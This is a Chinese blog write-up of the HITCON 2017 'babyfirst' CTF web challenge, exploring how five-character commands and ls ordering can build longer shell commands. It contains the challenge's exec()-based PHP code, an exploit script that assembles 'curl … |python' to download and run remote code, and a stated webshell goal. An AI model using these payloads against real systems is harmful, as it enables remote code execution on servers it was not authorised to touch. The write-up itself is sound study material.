从HITCON2017 babyfirst去研究ls命令

前几天做了一道HITCON2017的web题目,与朋友交流之后,有了一点思路,奈何最后还是没有成功解出这题。在writeup出来后,在复现的过程中遇到了一些问题,记录一下。

babyfirst的wp

题目的源码:index.php

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

大致题目的意思就是,当你在GET参数cmd的时候限制了字符的长度为5,思路就是要想办法绕过这个限制来获得webshell

官方给出的exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    '>on', 
    '>th\\', 
    '>py\\', 
    '>\|\\', 
    '>tw\\',
    '>e.\\', 
    '>ng\\', 
    '>ra\\', 
    '>o\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # exec
    'sh _', 
    'sh g', 
]



r = requests.get('http://52.199.204.34/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
    print i
    sleep(0.2)

由于我是在本地搭建的环境,不太清楚他的具体环境,只要演示通过这个index.php获得一个webshell就行了。
这个思路就是先想办法通过ls命令,构造出包含 ls -t>g 这条命令的文件,然后再执行它构造出一个包含一句话木马的webshell.
先参考这个文档:


image.png

image.png

箭头指向的那个字符串,其实是<php? eval($_GET[1])的base64编码,实际上最后执行会base64解码得到PHP一句话木马。

回到之前的题目,要求的是cmd提交的参数长度小于等于5,为了实现更短的生成文件,我们使用>xxx的方式来生成一个名为xxx的文件,而不是使用w>xxx
这个题目,由于最后要直接执行ls -t>g这条命令的话,至少需要7位的长度,因此考虑先把
ls -t>g用同样的方式把ls -t>g写进一个文件,然后使用sh命令执行这个文件就可以代替ls -t>g的功能。
Exp中

    # generate `ls -t>g` file
    '>ls\\', 
#因为ls命令显示的文件顺序是按名称来排序的,‘ \’ 会排列在 ‘ls\’ 的前面,因此需要先把 'ls\'先写入'_'这个文件,因此执行下面这条命令
    'ls>_', 
#后面的顺序,ls时默认是按照以下顺序的,因此可以直接输入
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
#最后执行的这条命令,会附加到后面,正好与前面的 'ls\'结合到一起形成'ls -t>g'
    'ls>>_', 

这部分就是要完成这个功能。

重点来了,我们今天要谈论的问题就是与这个相关。

经过实际的尝试,使用python脚本,把参数按照上面的顺序post到webserver


image.png

执行之后,确实在对应的目录下面生成了一个名为_的文件,这个文件的内容为:

image.png

最后确实成功执行了ls -t>g这个命令。

注:箭头指向的 \ 实际是因为shell执行换行的命令组合时,需要 \ 来进行转义,否则会单行顺序执行命令。

然而,仔细看上面ls之后显示的文件的排列顺序,实际上在写入'_'文件之后,生成的文件内容不应该是上面的样子。
我实际在bash里面按顺序执行以下命令:

    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'
执行exp.py得到的
直接在bash终端执行得到的

生成的_文件的内容与通过exp脚本提交参数之后生成的不一样,而用sh执行之后也不能成功执行ls -t>g的命令。

究其原因,就是因为ls命令列目录的时候,'_'和'>g'这两个文件的顺序在-t>这个文件的前面。因此没有办法成功的构造出一个ls -t>g的命令。
经过在我的虚拟机上测试(kali 2.0和ubuntu 16.04)上面测试,使用bash和sh两个终端执行的结果都是一样的,无法成功构造出ls -t>g
我原本以为可能是与exec函数有关,但是实际直接在终端执行php文件的话,构造的结果还是与bash的一样。

因此,我得出的一个结论:

通过webserver中间件 和直接在终端, 执行ls命令,得到的文件的列表的顺序是不一样的。具体的原因暂时还不清楚,希望能有大佬给我指教。感激不尽。

附:本地脚本测试的时候的index.php脚本和exp.py

<?php
    $sandbox = '/var/www/html/sanbox/' . md5("orange" . $_SERVER['REMOTE_ADDR'])
;
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'
    ]

r = requests.post('http://127.0.0.1/test/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.post('http://127.0.0.1/test/?cmd=' + quote(i) )
    print i
    sleep(0.2)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,014评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,796评论 3 386
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,484评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,830评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,946评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,114评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,182评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,927评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,369评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,678评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,832评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,533评论 4 335
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,166评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,885评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,128评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,659评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,738评论 2 351

推荐阅读更多精彩内容